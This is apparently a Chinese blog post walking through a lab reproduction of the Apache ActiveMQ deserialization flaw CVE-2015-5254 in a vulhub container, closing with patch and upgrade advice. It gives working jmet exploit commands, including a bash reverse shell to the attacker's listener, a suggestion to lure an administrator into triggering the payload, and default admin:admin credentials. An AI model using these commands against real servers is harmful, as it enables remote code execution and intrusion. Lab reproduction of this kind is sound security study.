博主介绍
博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
点赞➕评论➕收藏 == 养成习惯(一键三连)
欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋
作者水平有限,欢迎各位大佬指点,相互学习进步!
CVE-2015-5254
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。
Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
Apache ActiveMQ 5.13.0之前5.x版本
https://www.cvedetails.com/cve/CVE-2015-5254/
[{
"match": "port_contains",
"content": "8161"
},
{
"match": "server_contains",
"content": "jetty"
}],
[
{
"match": "banner_contains",
"content": "server:activemq"
}],
[
{
"match": "header_contains",
"content": "realm=\"activemqrealm"
},
{
"match": "banner_contains",
"content": "magic:activemq"
}],
[
{
"match": "banner_contains",
"content": "realm=\"activemqrealm"
}]
vluhub漏洞靶场搭建
采用vulhub环境
切换到CVE-2015-5254目录下
cd vulhub/activemq/CVE-2015-5254
启动CVE-2015-5254环境
docker-compose up -d
查看CVE-2015-5254环境
docker-compose ps
bash
![在这里插入图片描述](https://img-blog.csdnimg.cn/9699db462bfe4235bd897c4699c2a3c4.png)
>访问CVE-2015-5254环境
```bash
http://ip:8161
关闭环境:
复现完毕记得关闭环境
docker-compose down
我攻击机用本机windows:192.168.13.1
靶机kali:192.168.13.131
下载漏洞利用工具
构造(可以使用ysoserial)可执行命令的序列化对象
作为一个消息,发送给目标61616端口
访问的Web管理页面,读取消息,触发漏洞
漏洞利用工具下载地址:
https://download.csdn.net/download/qq_51577576/86400301
构造(可以使用ysoserial)可执行命令的序列化对象,作为一个消息,发送给目标61616端口。
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.13.131 61616
看到了event队列消息,说明创建成功
http://192.168.13.131:8161/admin/browse.jsp?JMSDestination=event
查看容器
docker ps
进入容器
docker exec -it 150f15ae6877 /bin/bash
点击查看这条消息即可触发命令执行,此时进入容器
docker-compose exec activemq bash
,可见/tmp/success已成功创建,说明漏洞利用成功:
攻击机是本机windows:192.168.13.1
靶机是kali:192.168.13.131
.\nc.exe -lvvp 33333
利用工具反序列化
java -jar jmet-0.1.0-all.jar -Q 111111111111111111 -I ActiveMQ -s -Y "bash -i>&/dev/tcp/192.168.13.1/33333 0>&1" -Yp ROME 192.168.13.131 61616
http://192.168.13.131:8161/admin/browse.jsp?JMSDestination=111111111111111111
通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。
[Vuln: brute-force]
Target "http://192.168.13.131:8161/admin/"
VulnType "basic-auth/default"
username map["field":"username" "value":"admin"]
password map["field":"password" "value":"admin"]
from_url "http://192.168.13.131:8161/"
存在暴力破解漏洞,理论上来说是可以跑出账号密码的。这里抛出了admin:admin的账号密码(默认密码)
[Vuln: phantasm]
Target "http://192.168.13.131:8161/"
VulnType "poc-yaml-activemq-default-password/default"
links ["https://blog.csdn.net/ge00111/article/details/72765210"]
ActiveMQ 默认用户名和密码
用户名:admin
密码:admin
可以在/conf/users.properties中寻找。
默认登录地址:http://localhost:8161/admin/
打补丁,http://activemq.apache.org/security-advisories.data/CVE-2015-5254-announcement.txt
升级到最新版本
有WAF的可以配置相关规则进行拦截
ActiveMQ反序列化漏洞复现CVE-2015-5254漏洞复现所利用工具jmet-0.1.0-all.jar
原文下载
vluhub漏洞靶场搭建